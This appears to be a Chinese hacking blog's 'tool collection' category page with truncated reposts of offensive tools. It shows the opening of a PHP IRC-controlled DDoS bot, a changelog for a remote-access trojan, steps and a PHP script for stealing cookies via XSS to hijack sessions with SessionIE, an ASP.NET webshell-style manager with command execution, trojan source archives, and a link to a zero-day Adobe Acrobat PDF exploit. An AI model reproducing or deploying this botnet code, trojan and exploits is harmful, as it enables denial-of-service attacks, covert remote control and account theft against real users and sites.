分类 ‘工具收集’ 下的日志

PHP DDoS Bot

来源:amxku's blog

<?php
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {
阅读全文 »

Tags: ,

irat – 内测版 1010

来源:XG's Blog

history

说明

修正bug
[+]增加功能
[-]去掉功能
[PS]附加说明

2007-10-10 var 1.2 b6

关闭客户端当有聊天窗口服务端不能关闭

服务端有时CPU占用100%

屏幕监控界面改进

修改备注要重启服务端显示
[+]屏幕监控鼠标轨迹
[+]屏幕监控保存为jpg格式图片
[+]备用上线地址
[+]消息广播
[+]3端口同时监听
[+]被控端解析program files目录
[-]被控端解析temp目录

2007-10-7 16:47:09 var 1.1 b5

屏幕监控关闭后,有时服务端吃了cpu问题
[+]参数设置
[+]部分Hint提示
[+]任意可视窗口闪屏

2007-10-3 VAR 1.1 bate1
阅读全文 »

配合XSS工具SessionIE的php脚本

鬼仔注:SessionIE昨天 发过了

作者:云舒

我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程序,我只有php空间,因此写了个php的作测试用。
代码:
阅读全文 »

Tags:

特南克斯的一些源码

鬼仔注:在 清雅风萍 那里看到的,给了一个下载链接,我弄了下文件列表,抓了张图,box允许单文件最大10M,没办法,传到了Live SkyDrive上提供下载。其中有几个以前已经发过了。

# 压缩文件 C:\Documents and Settings\鬼仔\桌面\特南克斯源码.rar
2007-03-04 16:48 文件夹 文件夹 myBindFile
2007-03-04 16:48 文件夹 文件夹 opents
2007-03-04 16:48 文件夹 文件夹 SetDownloader
2007-03-04 16:48 文件夹 文件夹 便捷3389
2007-03-04 阅读全文 »

Tags:

SeesionIE beta

作者:cnqing
来源:中国互联网信息安全团队

SeesionIE v1021 beta
说明:
利用COOKIE信息来伪造会话的工具,内置winpcap.类似“黑帽”聚会中的hamster
v1.0.2.1更新:
1.去除了DEV皮肤控件
2.修正了多次覆盖COOKIE的Bug

整个过程分两步
A.xss取cookie
B.利用cookie伪造session

==========================================================================
Example:

A:
  1.将下载的hkcxss.asp放到支持ASP的服务器,这里是http://www.cncert.net/xss/c.asp。
  这是盗cookie脚本,结果存为同目录的cookies.xml
阅读全文 »

Tags:

红客中国WEBMS

作者:cnqing
来源:中国互联网信息安全团队

WEBMS beta版

红客中国WEBMS是基于ASP.NET 2.0开发的一个实时的在线网站管理系统,基本包含以下几个功能:

1.文件管理:进行权限范围内的文件上传、新建、删除、修改、复制、粘贴、下载等功能。界面如图:

2.进程管理:进行权限范围内的进程列表,进程结束。界面如图:

3.CMD执行:执行权限范围内的任意命令,支持自定义CMD路径:

4.数据库管理:进行权限范围内的数据查询,自动分析数据表,字段,暂不支持修改:
阅读全文 »

超星0DAY

来源:7jdg's blog

又是一个0day,0day年年有,今天特别多呀。声明一下,不是偶fuzz到的。。。 感谢精灵

超星阅览器(SSReader)是超星公司拥有自主知识产权的图书阅览器,是专门针对数字图书的阅览、下载、打印、版权保护和下载计费而研究开发的。经过多年不断改进,SSReader现已发展到3.73版本,下载量已经突破1500万次,是国内外用户数量最多的专用图书阅览器之一。
阅读全文 »

Tags:

Zero day PDF exploit for Adobe Acrobat

来源:Ph4nt0m Google Group

Link to exploit:

Please download and open it locally in Adobe Acrobat (not in Adobe Acrobat
ActiveX control):

http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf

Description:

0-day proof of concept (PoC) exploit for Adobe Acrobat.

Software affected:

+ Adobe Reader 8.1 (and earlier)
+ Adobe Acrobat Standard, 阅读全文 »

Tags: ,